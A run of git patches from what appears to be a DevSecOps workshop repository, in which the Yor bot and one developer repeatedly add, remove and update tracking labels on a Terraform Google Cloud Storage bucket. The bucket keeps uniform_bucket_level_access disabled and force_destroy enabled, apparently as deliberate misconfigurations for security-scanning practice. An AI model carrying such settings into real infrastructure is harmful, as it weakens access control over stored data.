<41898282+github-actions[bot]@users.noreply.github.com> Date: Mon, 18 Aug 2025 07:22:55 +0000 Subject: [PATCH 47/51] Update tags (by Yor) --- code/build/gcs.tf | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index 5f22da4a7..cbe5aa02f 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -10,7 +10,7 @@ resource "google_storage_bucket" "Example" { uniform_bucket_level_access = false labels = { - git_commit = "1312da753697eb030b8914b7b192b1a81d0b8fc5" + git_commit = "1e10b0e771ee76f1c595fdd99b6b7e5ea3deceb0" git_file = "code__build__gcs_tf" git_last_modified_at = "2025-08-18-07-06-33" git_last_modified_by = "52453932danielma911" From c75a7457cb596459de04790b27d69f3ee889a3b3 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Mon, 18 Aug 2025 07:23:30 +0000 Subject: [PATCH 48/51] Update tags (by Yor) --- code/build/gcs.tf | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index cbe5aa02f..5f22da4a7 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -10,7 +10,7 @@ resource "google_storage_bucket" "Example" { uniform_bucket_level_access = false labels = { - git_commit = "1e10b0e771ee76f1c595fdd99b6b7e5ea3deceb0" + git_commit = "1312da753697eb030b8914b7b192b1a81d0b8fc5" git_file = "code__build__gcs_tf" git_last_modified_at = "2025-08-18-07-06-33" git_last_modified_by = "52453932danielma911" From 8b01968a3ab2b9a1c8f4f38b1d51f999c85df31d Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Mon, 18 Aug 2025 15:26:48 +0800 Subject: [PATCH 49/51] Update gcs.tf --- code/build/gcs.tf | 12 +----------- 1 file changed, 1 insertion(+), 11 deletions(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index 5f22da4a7..c071d6f96 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -9,17 +9,7 @@ resource "google_storage_bucket" "Example" { force_destroy = true uniform_bucket_level_access = false - labels = { - git_commit = "1312da753697eb030b8914b7b192b1a81d0b8fc5" - git_file = "code__build__gcs_tf" - git_last_modified_at = "2025-08-18-07-06-33" - git_last_modified_by = "52453932danielma911" - git_modifiers = "52453932danielma911" - git_org = "danielma911" - git_repo = "prisma-cloud-devsecops-workshop" - yor_name = "Example" - yor_trace = "b71fbd0b-de17-4226-98e1-6b56de4d4db0" - } + } resource "random_id" "Rand_suffix" { From 6faca155aa886f92cc6b6a7cbae3959ab015011f Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Mon, 18 Aug 2025 07:27:08 +0000 Subject: [PATCH 50/51] Update tags (by Yor) --- code/build/gcs.tf | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index c071d6f96..a9d4dfee0 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -10,6 +10,17 @@ resource "google_storage_bucket" "Example" { uniform_bucket_level_access = false + labels = { + git_commit = "1312da753697eb030b8914b7b192b1a81d0b8fc5" + git_file = "code__build__gcs_tf" + git_last_modified_at = "2025-08-18-07-06-33" + git_last_modified_by = "52453932danielma911" + git_modifiers = "52453932danielma911" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "Example" + yor_trace = "f1afb72e-2fec-49e9-bd3f-03fef6f3075a" + } } resource "random_id" "Rand_suffix" { From a5019c210d4b9e89ee1708c2c22560f772c671f4 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Mon, 18 Aug 2025 07:27:25 +0000 Subject: [PATCH 51/51] Update tags (by Yor) --- code/build/gcs.tf | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index a9d4dfee0..04735b606 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -11,9 +11,9 @@ resource "google_storage_bucket" "Example" { uniform_bucket_level_access = false labels = { - git_commit = "1312da753697eb030b8914b7b192b1a81d0b8fc5" + git_commit = "8b01968a3ab2b9a1c8f4f38b1d51f999c85df31d" git_file = "code__build__gcs_tf" - git_last_modified_at = "2025-08-18-07-06-33" + git_last_modified_at = "2025-08-18-07-26-48" git_last_modified_by = "52453932danielma911" git_modifiers = "52453932danielma911" git_org = "danielma911"